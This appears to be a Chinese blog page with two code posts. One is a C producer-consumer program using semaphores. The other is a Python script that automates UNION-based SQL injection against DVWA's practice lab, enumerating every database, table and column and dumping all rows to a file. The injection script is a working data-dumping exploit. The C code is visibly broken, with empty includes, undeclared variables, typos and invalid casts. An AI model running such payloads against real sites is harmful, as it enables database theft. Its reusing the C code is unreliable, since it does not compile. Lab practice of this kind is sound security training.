进程同步(C代码)

说是进程同步,实际上写的是一个由信号量控制的多线程的程序,有限缓冲区的读写问题。

//////////////////////////////////////////////////////////
//author : superfish
//date : 2015/11/18
//name : buffer.h
//////////////////////////////////////////////////////////
#include <semaphore.h>
#ifndef _BUFFER_H
#define _BUFFER_H
 
#define BUFFER_SIZE 5
#define TRUE 1
#define FALSE 0
 
typedef struct
{   //定义缓冲区结构
	int buffer[BUFFER_SIZE]; //缓冲区
	int read_i; //读位置
	int write_i; //写位置
	int count; //需要处理的元素个数
	int written_c; //已经写入的元素个数
	int read_c; //已经读取的元素个数
}BUFFER;
 
typedef struct
{   //定义线程函数参数的结构
	BUFFER *pBUFFER;
	sem_t mutex; //互斥锁
	sem_t empty, full; //标准记数信号量
}PARAM;
 
//bufferfunc.c
BUFFER * init_buffer(int count);
int inserti(int item, BUFFER * pBUFFER, sem_t mutex, sem_t empty, sem_t full);
int removei(int item, BUFFER * pBUFFER, sem_t mutex, sem_t empty, sem_t full);
 
//procon.c
unsigned int getrand(unsigned int n);
int producer(void * param);
int consumer(void * param);
#endif
 
//////////////////////////////////////////////////////////
//author : superfish
//date : 2015/11/18
//name : bufferfunc.c
//////////////////////////////////////////////////////////
#include 
#include 
#include "buffer.h"
 
BUFFER * init_buffer(int count)
{   //初始化BUFFER
	BUFFER * pBUFFER;
	pBUFFER = (BUFFER *)malloc(sizeof(BUFFER));
 
	memset(pBUFFER-&gt;buffer, 0, BUFFER_SIZE);
	pBUFFER-&gt;read_i = 0;
	pBUFFER-&gt;write_i = 0;
	pBUFFER-&gt;read_c = 0;
	pBUFFER-&gt;written_c = 0;
	pBUFFER-&gt;count = count;
 
	return pBUFFER;
}
 
 
int inserti(int item, BUFFER * pBUFFER, sem_t mutex, sem_t empty, sem_t full)
{   //把一个元素放入缓冲区
	int i = pBUFFER-&gt;write_i;
 
	while(TRUE){
		sem_wait(&amp;empty);
		sem_wait(&amp;mutex);
 
		//临界区
		if(pBUFFER-&gt;written_c == pBUFFER-&gt;count){ //任务已经完成了
			sem_post(&amp;mutex);	
 
			return 0;
		}else{
			buffer[i%BUFFER_SIZE] = item;
			pBUFFER-&gt;write_i = (i+1)%BUFFER_SIZE;
			(pBUFFER-&gt;written_c)++;			
			sem_post(&amp;mutex);
			sem_post(&amp;full);
 
			return 1;
		}	
	}	
}
 
int removei(int item, BUFFER * pBUFFER, sem_t mutex, sem_t empty, sem_t full)
{   //从缓冲区取出一个元素
	int i = pBUFFER-&gt;read_i;
 
	while(TRUE){
		sem_wait(&amp;full);
		sem_wait(&amp;mutex);
 
		//临界区
		if(pBUFFER-&gt;read_c == pBUFFER-&gt;count){ //任务已经完成了
			sem_post(&amp;mutex);	
 
			return 0;
		}else{
			item = buffer[i%BUFFER_SIZE];
			pBUFFER-&gt;read_i = (i+1)%BUFFER_SIZE
			(pBUFFER-&gt;read_c)++;	
			sem_post(&amp;mutex);
			sem_post(&amp;empty);
 
			return item;
		}		
	}	
}
 
 
//////////////////////////////////////////////////////////
//author : superfish
//date : 2015/11/18
//name : procon.c
//////////////////////////////////////////////////////////
#include 
#include 
#include 
#include "buffer.h"
 
extern param;
 
unsigned int getrand(unsigned int n)
{   //生成一个1~n的随机整数
	srand(time(0));
	return rand()%(n+1);
}
 
int producer(void * p)
{   //生产者
	int item;
	int id;
	BUFFER *pBUFFER = param-&gt;pBUFFER;
	sem_t mutex = param-&gt;mutex;
	sem_t empty = param-&gt;empty;
	sem_t full = param-&gt;full;
 
	item = getrand(100);
	id = pthread_self(); //当前线程号
	sleep(getrand(3)); //生产者随机休息1~3秒
	while(TRUE){
		if(!inserti(item, pBUFFER, mutex, empty, full)){
			break;
		}else{
			printf("Thread %d product a %d\n", id, item);
		}
	}
	return 0;
}
 
int consumer(void * p)
{   //消费者
	pthread id;
	int item;
	BUFFER *pBUFFER = param-&gt;pBUFFER;
	sem_t mutex = param-&gt;mutex;
	sem_t empty = param-&gt;empty;
	sem_t full = param-&gt;full;
 
	id = pthread_self(); //当前线程号
	sleep(getrand(5)); //消费者随机休息1~5秒
	while(TRUE){
		item = removei(item, pBUFFER, mutex, empty, full);
		if(!item){
			break;
		}
		else{
			printf("Thread %d consume a %d\n", id, item);
		}
	}
	return 0;
}
 
 
//////////////////////////////////////////////////////////
//author : superfish
//date : 2015/11/18
//name : main.c
//////////////////////////////////////////////////////////
#include 
#include 
#include 
#include 
#include "buffer.h"
 
PARAM *param; //全局参数结构
 
int main(int argc, char ** argv)
{   //主函数
	int i;
	int count; //任务量
	int pnun, cnum; //生产者、消费者线程数
	BUFFER *pBUFFER; //缓冲区结构	
	pthread *ptid; //生产者线程id数组
	pthread *ctid; //消费者线程id数组
	pthread_attr_t attr; //线程属性
 
	//错误处理
	if(argc != 4){
		fprintf(stderr, "Param error!\n");
		return -1;
	}
	if(int(argv[1]) &lt; 1 || int(argv[2]) &lt; 1 || int(argv[3]) &lt; 1){
		fprintf(stderr, "Value error!\n");
		return -2;
	}
 
	//初始化
	sem_init(&amp;(param-&gt;mutex), 0, 1);
	sem_init(&amp;(param-&gt;empty), 0, BUFFER_SIZE);
	sem_init(&amp;(param-&gt;full), 0, 0);
	count = int(argv[1]);
	pnum = int(argv[2]);
	cnum = int(argv[3]);
	param-&gt;pBUFFER = init_buffer(count);
	ptid = (pthread *)malloc(pnum * sizeof(pthread));
	citd = (pthread *)malloc(cnum * sizeof(pthread));
	pthread_attr_init(&amp;attr);
 
	//创建生产者线程
	for(i = 0;i &lt; pnum;i++){
		pthread_create(&amp;ptid[i], &amp;attr, producer, NULL);
	}
 
	//创建消费者线程
	for(i = 0;i &lt; cnum;i++){
		pthread_create(&amp;ctid[i], &amp;attr, consumer, NULL);
	}
 
	//等待生产者线程结束
	for(i = 0;i &lt; pnum;i++){
		pthread_join(ptid[i], NULL);
	}
 
	//等待消费者线程结束
	for(i = 0;i &lt; cnum;i++){
		pthread_join(ctid[i], NULL);
	}
 
	printf("All done!");
	sleep(2);
	return 0;
}

DVWA SQL Injection脱裤脚本(python代码)

针对DVWA上low等级下有回显的SQL注入实验进行脱裤。medium等级只需把字符型改为数字型(把payload里1后面的单引号去掉)即可。

#coding=utf-8
'''
author : superfish
date : 2015/11/16
name : dvwasqli.py
'''
import urllib2
import urllib
import re
import sys
import binascii
import requests
 
# 字符串转CHAR(...)
def word2ascii(s):
	res = []
	for i in s:
		res.append(ord(i))
	ress = str(tuple(res))
	resss = 'CHAR' + ress
 
	return resss
 
# 取得查询结果
def getkey(payload, s):
	key = ''
 
	urlpayload = urllib.quote(payload)
	url = "http://10.206.6.10/dvwa/vulnerabilities/sqli/?id=%s&Submit=Submit" % urlpayload
 
	# 请求
	c = s.get(url)
	cont = c.content
 
	see = re.search(r"\^\^\^((.|\n)*)\^\^\^", cont)
	if see:
		# 显示长度够且查询结果不为空
		key = see.group(1)
	else:
		# 查询结果为空或显示长度不够
		pay = re.search(r"UNION SELECT (.*),2 FROM", payload)
		newpayload = payload.replace(pay.group(1), "length(%s)" % pay.group(1))
		newurlpayload = urllib.quote(newpayload)
		newurl = "http://10.206.6.10/dvwa/vulnerabilities/sqli/?id=%s&Submit=Submit" % newurlpayload
		newc = s.get(newurl)
		newcont = newc.content
		newsee = re.search(r"\^\^\^((.|\n)*)\^\^\^", newcont)
 
		# 查询结果为空
		if newsee is None:
			key = ''
 
		# 处理显示长度不够的情况
		else:
			# 得到长度
			lth = int(newsee.group(1))
			# 循环得到每个字符
			for i in range(1, lth+1):
				newpayload = payload.replace(pay.group(1), "substr(%s,%d,1)" % (pay.group(1), i))
				newurlpayload = urllib.quote(newpayload)
				newurl = "http://10.206.6.10/dvwa/vulnerabilities/sqli/?id=%s&Submit=Submit" % newurlpayload
				newc = s.get(newurl)
				newcont = newc.content
				newsee = re.search(r"\^\^\^((.|\n)*)\^\^\^", newcont)
				key += newsee.group(1)
 
	return key
 
# 存放数据库数据
f = open('out.txt','w')
 
databases = []
tables = []
columns = []
 
s = requests.Session()
s.headers.update({'Host':'10.206.6.10'})
s.headers.update({'Proxy-Connection':'keep-alive'})
s.headers.update({'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'})
s.headers.update({'Upgrade-Insecure-Requests':'1'})
s.headers.update({'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36'})
s.headers.update({'Referer':'http://10.206.6.10/dvwa/vulnerabilities/sqli/'})
s.headers.update({'Accept-Encoding':'gzip, deflate, sdch'})
s.headers.update({'Accept-Language':'zh-CN,zh;q=0.8'})
s.headers.update({'Cookie':'security=low; PHPSESSID=4qc1tgj902k827t9fhtbc9pm22'})
 
# 每次查询结果两端的标识CHAR(94,94,94),即^^^
# 爆库
payload = "1' AND 1=2 UNION SELECT CONCAT(CHAR(94,94,94),GROUP_CONCAT(schema_name),CHAR(94,94,94)),2 FROM information_schema.schemata#"
key = getkey(payload, s)
if key == '':
	print "error!"
	sys.exit(0)
databases = key.split(',')
print "Databases : "
print databases
print
 
# 循环爆表
for database in databases:
 
	# information_schema库不爆,因为没意义
	if database == "information_schema":
		continue
 
	f.write("Database %s : \n" % database)
	print "-- Database %s " % database
 
	payload = "1' AND 1=2 UNION SELECT CONCAT(CHAR(94,94,94),GROUP_CONCAT(table_name),CHAR(94,94,94)),2 FROM information_schema.tables WHERE table_schema=%s#" % word2ascii(database)
	key = getkey(payload, s)
	if key == '':
		f.write("Database %s have nothing\n\n" % database)
		continue
	else:
		tables = key.split(',')
 
	# 循环爆列
	for table in tables:
		f.write("Table %s : \n" % table)
		print "  |-- Table %s " % table
 
		payload = "1' AND 1=2 UNION SELECT CONCAT(CHAR(94,94,94),GROUP_CONCAT(column_name),CHAR(94,94,94)),2 FROM information_schema.columns WHERE table_schema=%s AND table_name=%s#" % (word2ascii(database),word2ascii(table))
		key = getkey(payload, s)
		if key == '':
			f.write("Table %s doesn't have any column\n" % table) # 应该不会这样吧 - -
			continue
		else:
			columns = key.split(',')
			f.write("||")
			for column in columns:
				f.write("%s|" % column)
			f.write("|\n")
 
		# dump 列之间以|分割
		payload = "1' AND 1=2 UNION SELECT CONCAT(CHAR(94,94,94),GROUP_CONCAT(CONCAT(CHAR(124,124)"
		for column in columns:
			payload += ",%s,CHAR(124)" % column
		tail = ",CHAR(124))),CHAR(94,94,94)),2 FROM %s.%s#" % (database, table)
		payload += tail
		key = getkey(payload, s)
		if key == '':
			f.write("Table %s have nothing\n" % table)
			continue
		else:
			dump = key.replace("||,||", "||\n||")
			f.write("%s" % dump)
 
		f.write("\n")
 
	print "[*] Database %s dumped!\n" % database
 
f.close()
print "Completed!"